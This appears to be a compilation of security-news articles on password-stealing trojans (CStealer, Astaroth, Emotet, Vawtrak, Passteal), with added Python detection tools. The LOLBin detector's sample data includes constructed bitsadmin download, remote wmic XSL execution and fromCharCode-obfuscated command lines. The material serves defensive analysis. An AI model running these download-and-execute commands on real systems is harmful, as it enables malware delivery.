New Chrome Password Stealer, 'CStealer' Sends Stolen Data to a MongoDB Database


Credentials saved by Google Chrome, including usernames and passwords, are the target of a new trojan named CStealer, which harvests the data stored in the browser's password manager.

Password-stealing trojans run silently in the background and gather sensitive information about the system, such as logged-in users and network activity, together with usernames, passwords and other credentials stored on the system or in browsers. Whatever is harvested is sent to a destination chosen by the attacker.

The idea behind this stealer is the same as many others: take the credentials saved in the browser's password manager. What makes CStealer unusual is that it stores the stolen data directly in a remote MongoDB database.

The malware, discovered by MalwareHunterTeam and later analyzed by James, does not package the stolen data and send it to a command-and-control (C2) server run by the author. Instead, it connects directly to a remote MongoDB database and writes the stolen passwords into it.

The network traffic examined by James shows that, once passwords have been harvested, the malware connects to the database and stores the data there. To do so it carries hardcoded MongoDB credentials and uses the MongoDB C Driver as its client library.

The approach is slightly more unusual than a plain C2 upload, but it achieves the goal: the credentials are stolen. It also has a serious weakness for the attacker. Because the database credentials are hardcoded in the binary, anyone who examines a sample afterward, whether law enforcement, security researchers or other criminals, can recover them and use them to read everything the database contains.
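The weakness described above is easy to demonstrate. The following is an added example, not code from the original post or from the CStealer sample: it scans a binary blob for hardcoded MongoDB connection strings, in both plain ASCII and the UTF-16LE form Windows binaries often use, and reports any that embed a username and password. The sample bytes, the hostname db.example.invalid and the credentials in them are constructed for the demonstration.

```python
"""Pull hard-coded MongoDB connection strings (and any embedded credentials) out of a binary sample (added example)."""
import re
from typing import Dict, List, Optional
from urllib.parse import unquote, urlsplit

# ASCII form. The class stops at whitespace, quotes, angle brackets and NUL, which terminate C strings.
_URI_ASCII = re.compile(rb"mongodb(?:\+srv)?://[^\s\"'<>\x00]+")
# UTF-16LE form: every ASCII character is followed by a NUL byte, as in Windows wide strings.
_URI_WIDE = re.compile(
    rb"m\x00o\x00n\x00g\x00o\x00d\x00b\x00(?:\+\x00s\x00r\x00v\x00)?:\x00/\x00/\x00(?:[^\s\"'<>\x00]\x00)+"
)


def extract_mongo_uris(blob: bytes) -> List[str]:
    """Return every MongoDB URI found as a narrow or wide string, in order of appearance, de-duplicated."""
    hits = [(m.start(), m.group().decode("ascii", "replace")) for m in _URI_ASCII.finditer(blob)]
    hits += [(m.start(), m.group().decode("utf-16-le")) for m in _URI_WIDE.finditer(blob)]
    return list(dict.fromkeys(uri for _, uri in sorted(hits)))


def parse_uri(uri: str) -> Dict[str, Optional[str]]:
    """Split a MongoDB URI into the parts an analyst cares about; password is None unless embedded."""
    parts = urlsplit(uri)
    return {
        "uri": uri,
        "username": unquote(parts.username) if parts.username else None,
        "password": unquote(parts.password) if parts.password else None,
        "hosts": parts.netloc.rsplit("@", 1)[-1],
        "database": parts.path.lstrip("/") or None,
    }


def find_embedded_credentials(blob: bytes) -> List[Dict[str, Optional[str]]]:
    """URIs carrying a password: exactly what anyone holding the sample can recover and reuse."""
    return [p for p in map(parse_uri, extract_mongo_uris(blob)) if p["password"]]


# Constructed stand-in for a stealer binary: a PE-like header, one narrow URI with credentials,
# some filler, and one wide URI without a password. Not a real sample.
SAMPLE_BLOB = (
    b"MZ\x90\x00" + b"\x00" * 16
    + b"mongodb://stealer:Pa55w0rd@db.example.invalid:27017/cstealer\x00"
    + b"\x90" * 8
    + "mongodb://reader@db.example.invalid/logs".encode("utf-16-le") + b"\x00\x00"
)

if __name__ == "__main__":
    for cred in find_embedded_credentials(SAMPLE_BLOB):
        print(f"{cred['username']}:{cred['password']} -> {cred['hosts']} db={cred['database']}")
```

Run against a real sample, the same scan is the first thing a responder would do; if it returns a hit, the database credentials should be treated as public and the hosting provider notified, since every other party with the sample now has them too.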

Astaroth: The Trojan That Abuses Anti-Virus Software To Steal Data

A new Trojan has surfaced which disguises itself as GIF and image files and abuses installed anti-virus software to harvest data from the victim's PC.

A security research team reported that this variant makes use of modules that belong to the security software itself.

Abusing those modules gives the attacker access to the victim's data, including online credentials.

The Trojan hides as extension-less files so that it can move around the victim's PC undetected.

Spam emails and phishing messages lure the victim into downloading the malicious file. The legitimate Microsoft Windows BITSAdmin tool is then used to download the full payload from a command-and-control (C2) server.

The malware next launches an XSL script and establishes a channel with the C2 server. The script is obfuscated and contains functions meant to hide it from anti-virus software.

The same script drives BITSAdmin to download further payloads, Astaroth itself among them, from a different C2 server.

Older versions of this Trojan scanned for anti-virus programs and quit if "Avast" was present.

This version of Astaroth instead abuses the anti-virus software: a malicious module is injected into one of its processes.

Using legitimate, already-present system tools in this way is called living off the land, and the tools are known as LOLBins (Living Off the Land binaries). GAS, an anti-fraud security program, can be abused in the same way.

This Trojan first surfaced in 2017 in South America. It targets machines, passwords and other data. Astaroth can also log keystrokes, intercept calls and terminate processes.

The malware hides parts of its code as numeric character codes and reconstructs them at run time with fromCharCode(), so the code that actually executes never appears as plain text in the file. This is an upgrade over older versions of Astaroth.

LOLBins have a lot of malicious potential, including the theft of credentials and personal data. The technique is highly attractive to criminals, and defenders need to prepare for it.
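The infection chain above (BITSAdmin fetching payloads, an XSL script launched for execution, and fromCharCode() hiding the strings that matter) is exactly what a detection engineer would want to catch in process-creation telemetry. The following is an added example, not code from the original post or from any Astaroth analysis: it first undoes String.fromCharCode(...) obfuscation in script text, then flags command lines that use bitsadmin /transfer with a URL or wmic /format with a remote or .xsl stylesheet. The choice of WMIC as the XSL launcher is an assumption (the post does not name the tool; WMIC's /format switch is the usual LOLBin for running XSL), and the command lines, the script snippet and the URLs under 203.0.113.7 are constructed.

```python
"""Spot living-off-the-land download/execute chains, including ones hidden behind fromCharCode (added example)."""
import re
from typing import Dict, List

# JavaScript's String.fromCharCode takes UTF-16 code units, so mask each value to 16 bits as the engine does.
_FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\s*\(\s*([\d\s,]*\d)\s*\)", re.I)


def decode_fromcharcode(text: str) -> str:
    """Replace every String.fromCharCode(n, n, ...) literal with the string it evaluates to."""
    def expand(m):
        codes = [n for n in re.split(r"\s*,\s*", m.group(1).strip()) if n]
        return "".join(chr(int(n) & 0xFFFF) for n in codes)
    return _FROMCHARCODE_RE.sub(expand, text)


_BITS = re.compile(r"\bbitsadmin(?:\.exe)?\b.*?\s/transfer\b", re.I)
_URL = re.compile(r"\bhttps?://[^\s\"']+", re.I)
# Assumption: XSL scripts are launched through WMIC's /format switch (the post names no tool).
_WMIC_FORMAT = re.compile(r"\bwmic(?:\.exe)?\b.*?/format:\s*\"?([^\s\"]+)", re.I)


def classify_cmdline(cmdline: str) -> List[str]:
    """Return the LOLBin techniques a single command line matches (empty list if benign)."""
    hits = []
    if _BITS.search(cmdline) and _URL.search(cmdline):
        hits.append("bitsadmin download")
    m = _WMIC_FORMAT.search(cmdline)
    # Built-in formats such as /format:list are normal; a URL or an .xsl file is script execution.
    if m and (_URL.match(m.group(1)) or m.group(1).lower().endswith(".xsl")):
        hits.append("wmic xsl execution")
    return hits


def scan(texts: List[str]) -> List[Dict[str, object]]:
    """Decode fromCharCode first, then classify each line of each text; returns only the findings."""
    findings = []
    for text in texts:
        for line in decode_fromcharcode(text).splitlines():
            techniques = classify_cmdline(line)
            if techniques:
                findings.append({"line": line.strip(), "techniques": techniques, "urls": _URL.findall(line)})
    return findings


# Constructed process command lines; two malicious, two benign. Not real telemetry.
SAMPLE_CMDLINES = [
    'bitsadmin /transfer job1 /download /priority foreground http://203.0.113.7/ab.gif C:\\Users\\Public\\ab.gif',
    'wmic os get /format:"http://203.0.113.7/stage.xsl"',
    'bitsadmin /list /allusers',
    'wmic os get caption /format:list',
]
# Constructed JScript fragment whose only visible content is a list of character codes.
SAMPLE_SCRIPT = (
    'var c = new ActiveXObject("WScript.Shell");\n'
    'c.Run(String.fromCharCode(98,105,116,115,97,100,109,105,110,32,47,116,114,97,110,115,102,101,114,32,106,32,'
    '104,116,116,112,58,47,47,50,48,51,46,48,46,49,49,51,46,55,47,112,46,106,112,103,32,67,58,92,116,46,106,112,103));\n'
)

if __name__ == "__main__":
    for finding in scan(SAMPLE_CMDLINES + [SAMPLE_SCRIPT]):
        print(finding["techniques"], finding["urls"], finding["line"])
```

Decoding before matching is the important design choice: a rule that only looks at the raw script text would see nothing but digits, which is the whole point of the fromCharCode() trick.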

The Return Of Trojan Poses Substantial Hacking Threat To Businesses!

Trojan malware has returned in new infection campaigns aimed at harvesting banking credentials, personal data and intellectual property.

Business organizations have become the latest targets of this malware.

With long-running, stealthy operations as its goal, the Trojan threatens intellectual property as much as it threatens bank accounts.

A recent report from a well-known security company notes that backdoor attacks against businesses, delivered by Trojans, have increased substantially.

The same lab points out that "Trojans" and "backdoors" are different things.

A Trojan is a program that claims to perform one function but performs another; a backdoor is a type of Trojan that lets a threat actor reach a system while bypassing its security controls.

"Spyware" attacks have risen as well. Spyware is malware that stealthily collects information from a device and sends it to a third party.

The concept of spyware is old, but it remains as effective as any other malware and is aimed squarely at data exfiltration.

The "Emotet Trojan" has been behind information-stealing campaigns throughout last year and into the beginning of this month.

This Trojan can move through networks, harvest data and monitor network traffic. It also spreads to new systems on its own, with no substantial effort from the operator.

Emotet is a self-sufficient threat: it spreads across compromised systems and installs other malware on them.

The report also describes the menacing behaviour of TrickBot, one of the payloads Emotet delivers.

TrickBot evolves constantly and is updated with new capabilities, among them stealing passwords and browser histories and harvesting other sensitive data.

Consultancy firms appear to be the Trojan's primary targets, and it harvests more than banking details and personal information.

Intellectual property is now a major concern for everyone, since criminals are using Trojans to breach corporate defences.

These tactics were once considered boring and old, but they have taken serious twists and turns and evolved into something genuinely perilous.

Businesses should stop under-estimating these attacks and keep a keen eye out for any sign of them.

Banking Trojan Vawtrak

Banking Trojan Vawtrak (aka Neverquest or Snifula), which additionally uses the Pony module to steal a wide range of login credentials, has been proliferating rapidly over the last few months.

The USA, Germany, the UK and the Czech Republic are the most affected countries this year.

Trojans like this are not new; what makes Vawtrak remarkable is its multi-layered concealment and the wide range of functions it can execute.

Vawtrak spreads via drive-by download, through spam email attachments or links to compromised sites, through malware downloaders such as Zemot or Chanitor, and through exploit kits like Angler.

AVG, which has been tracking Vawtrak, has published a detailed analysis of its installation and functionality.

Installation
The trojan was delivered through a spam email purporting to come from Amazon, containing a link to a zip archive hosted on a compromised WordPress site. The delivered file was an executable dressed up to look like a PDF while actually carrying a screensaver (.scr) extension; .scr files are ordinary Windows executables. It installed itself on the system and ensured persistence by registering itself to run at Windows start-up. Without causing visible changes, it then dropped a DLL into the program folder and deleted its original copy.

This shorter second DLL decrypts its payload, which looks like a normal Windows executable but is a compressed file. The decompressed file replaces the second DLL and extracts the final module, itself compressed, which contains another two DLLs. The appropriate DLL then executes Vawtrak's main functionality.
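The lure file described above, an executable made to pass as a PDF and a screensaver at the same time, is the kind of thing a mail gateway or an analyst's triage script should catch before anyone double-clicks it. The following is an added example, not code from the original post or from AVG's report: it opens a zip attachment in memory and flags members whose name or content betrays a disguised executable (a document-looking name ending in an executable extension, an MZ header behind a non-executable extension, or a right-to-left override character in the name). The archive it inspects is constructed inline; the file names in it are made up.

```python
"""Triage a mail attachment archive for executables posing as documents (added example)."""
import io
import zipfile
from typing import Dict, List

# Extensions Windows executes directly; .scr (screensaver) is a PE executable despite the innocuous name.
EXECUTABLE_EXTS = {".exe", ".scr", ".pif", ".com", ".dll", ".cpl"}
DOCUMENT_EXTS = {".pdf", ".doc", ".docx", ".txt", ".jpg", ".png"}


def triage_member(name: str, head: bytes) -> List[str]:
    """Reasons a single archive member looks like a disguised executable (empty list if none)."""
    reasons = []
    base = name.lower().rsplit("/", 1)[-1]
    exts = ["." + p for p in base.split(".")[1:]]
    if exts and exts[-1] in EXECUTABLE_EXTS and any(e in DOCUMENT_EXTS for e in exts[:-1]):
        reasons.append("double extension: document name with executable suffix")
    if head[:2] == b"MZ" and (not exts or exts[-1] not in EXECUTABLE_EXTS):
        reasons.append("PE header (MZ) behind a non-executable extension")
    if "\u202e" in name:  # right-to-left override reverses how the tail of the name is displayed
        reasons.append("RTL override character in file name")
    return reasons


def triage_zip(data: bytes) -> Dict[str, List[str]]:
    """Map each suspicious member name to its reasons; returns {} for a clean archive."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as fh:
                head = fh.read(2)  # only the magic bytes are needed, so nothing large is extracted
            reasons = triage_member(info.filename, head)
            if reasons:
                findings[info.filename] = reasons
    return findings


def build_sample_zip() -> bytes:
    """Constructed lure archive: two PE stubs with document-looking names, plus a genuine text file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Amazon_Order_Details.pdf.scr", b"MZ\x90\x00" + b"\x00" * 60)
        zf.writestr("invoice.pdf", b"MZ\x90\x00" + b"\x00" * 60)  # PE hidden behind a PDF extension only
        zf.writestr("README.txt", b"Thank you for your order.\n")
    return buf.getvalue()


if __name__ == "__main__":
    for member, reasons in triage_zip(build_sample_zip()).items():
        print(member, "->", "; ".join(reasons))
```

Checking the magic bytes as well as the name matters: Windows hides known extensions by default, so a user sees "Amazon_Order_Details.pdf", and a name-only rule is defeated by simply not using a double extension.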

Functionality
Once executed, Vawtrak disables the protection of almost every known anti-virus product, steals passwords from browsers (even obscure ones such as K-Meleon or Flock) and other applications, steals browser history, modifies browser settings, logs keystrokes, takes screenshots or records user actions on the desktop, and enables remote access to the victim's system.

It also communicates with remote command-and-control servers: executing commands they send, uploading stolen information, and downloading new versions of itself and web-injection frameworks.
One notable feature is that it can reach update servers hosted as Tor hidden services through a Tor2web proxy, without installing any special software such as the Tor browser. The communication with the remote server is done over SSL, adding a further layer of encryption. Because updates are hidden with steganography, the user sees no sign of the Trojan operating or updating itself.

Vawtrak is not as advanced as some other families, but its actions are aggressive and may cause stability or performance problems on infected machines.

Staying vigilant about phishing and online scams is the most effective way of avoiding Vawtrak, but since it can also arrive without direct user interaction, an effective and up-to-date antivirus solution is of utmost importance.

For full analysis of the Trojan, read the complete report by AVG.

Passteal : password-stealing malware disguised as keygen and ebooks


Passteal is malware that steals passwords stored in the browser by running a legitimate password recovery tool. It is distributed disguised as key generators and ebooks.

This suggests the malware targets users who frequent torrent and other file-hosting sites looking for pirated software.

Older variants bundled the password recovery tool "PasswordFox"; the new variant uses the 'WebBrowserPassView' tool to extract credentials stored in major browsers: Internet Explorer 4.0 to 8.0, Mozilla Firefox 1.x to 4.x, Google Chrome and Apple Safari.

Once the tool has extracted the data, the malware stores the stolen credentials in an .XML file and sends the file to a remote FTP server.

According to the Trend Micro malware report, the password recovery tool lets PASSTEAL obtain all login credentials stored in the browser, including those for websites using secured connections (SSL or HTTPS).
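The exfiltration step is the weakest link in this chain from a defender's point of view: FTP carries the login and the file name in the clear, so an .XML upload to an outside host right after a USER/PASS exchange stands out in network telemetry. The following is an added example, not code from the original post or from Trend Micro's report: it groups FTP control-channel commands into sessions and flags those that upload a dump-like file (XML or other export formats a password recovery tool can write) to a server outside the RFC 1918 ranges. The log lines are constructed; the server address 198.51.100.9 is from the RFC 5737 documentation range and stands in for an arbitrary external host, and the line format itself is an assumption about the capture tool.

```python
"""Flag FTP sessions that push likely credential dumps to outside hosts (added example, constructed data)."""
import ipaddress
import re
from typing import Dict, List

# Constructed FTP control-channel log lines, not a real capture. Assumed format: "<client> -> <server> <COMMAND> [argument]".
SAMPLE_LINES = [
    "10.0.0.5 -> 198.51.100.9 USER drop",
    "10.0.0.5 -> 198.51.100.9 PASS hunter2",
    "10.0.0.5 -> 198.51.100.9 TYPE I",
    "10.0.0.5 -> 198.51.100.9 STOR WIN-7PC_browser_passwords.xml",
    "10.0.0.8 -> 192.168.1.20 USER backup",
    "10.0.0.8 -> 192.168.1.20 PASS s3cret",
    "10.0.0.8 -> 192.168.1.20 STOR nightly.tar",
    "10.0.0.9 -> 198.51.100.9 USER anonymous",
    "10.0.0.9 -> 198.51.100.9 RETR readme.txt",
]

_LINE = re.compile(r"^(\S+) -> (\S+) ([A-Za-z]+)(?: (.*))?$")
# Export formats password-recovery tools commonly write; the post names XML for Passteal.
DUMP_EXTENSIONS = (".xml", ".txt", ".csv", ".html")
# "Internal" is defined as RFC 1918 here rather than ipaddress.is_private, which also treats
# the RFC 5737 documentation ranges used in this sample as private.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_internal(ip: str) -> bool:
    """True for RFC 1918 addresses; anything else is treated as an external destination."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def parse_sessions(lines: List[str]) -> Dict[tuple, dict]:
    """Group commands by (client, server) and record the login and every uploaded file name."""
    sessions: Dict[tuple, dict] = {}
    for line in lines:
        m = _LINE.match(line)
        if not m:
            continue  # skip malformed lines rather than crash on them
        client, server, cmd, arg = m.group(1), m.group(2), m.group(3).upper(), m.group(4) or ""
        s = sessions.setdefault((client, server), {"user": None, "password_seen": False, "uploads": []})
        if cmd == "USER":
            s["user"] = arg
        elif cmd == "PASS":
            s["password_seen"] = True  # the password itself crossed the wire unencrypted
        elif cmd in ("STOR", "STOU", "APPE"):
            s["uploads"].append(arg)
    return sessions


def find_credential_exfil(lines: List[str]) -> List[Dict[str, object]]:
    """Sessions that upload a dump-like file to an external server after an FTP login."""
    findings = []
    for (client, server), s in parse_sessions(lines).items():
        suspect = [f for f in s["uploads"] if f.lower().endswith(DUMP_EXTENSIONS)]
        if not is_internal(server) and s["password_seen"] and suspect:
            findings.append({"client": client, "server": server, "user": s["user"], "files": suspect})
    return findings


if __name__ == "__main__":
    for f in find_credential_exfil(SAMPLE_LINES):
        print(f"{f['client']} uploaded {f['files']} to {f['server']} as {f['user']}")
```

The internal backup upload and the anonymous download are deliberately left unflagged; the rule is narrow on purpose, since FTP itself is still common enough on corporate networks that alerting on every STOR would bury the real finding.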